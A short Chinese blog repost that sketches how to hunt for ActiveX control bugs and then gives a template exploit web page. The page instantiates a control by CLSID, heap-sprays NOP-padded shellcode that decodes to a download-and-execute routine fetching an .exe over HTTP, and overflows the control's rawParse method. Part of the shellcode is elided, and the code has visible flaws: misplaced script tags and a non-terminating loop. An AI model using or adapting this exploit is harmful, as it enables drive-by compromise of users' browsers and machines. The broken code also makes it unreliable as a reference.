最近关于ActiveX控件漏洞猛报,利用工具也不少,特将其漏洞挖掘思路整理如下:
(1)下载并安装欲测试的软件
(2)使用COM Explorer软件查看ActiveX控件的各种属性
(3)通过VS2005对象浏览器查看控件中的变量、函数、函数参数,从中寻找可能存在漏洞的参数。
(4)进行漏洞的测试
(5)编写漏洞利用网页
网页大致内容如下:
<html>
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
<body>
<SCRIPT language="javascript">
var shellcode = unescape("%u9090"+"%u9090"+
"%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
。。。。。。(省略)
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u312f%u3732" +
"%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");
</script>
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) blockblock = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4096) buffer+="\x0a\x0a\x0a\x0a";
target.rawParse(buffer);
</body>
</html>
本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/51083
![主流浏览器四大综合性能测试[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)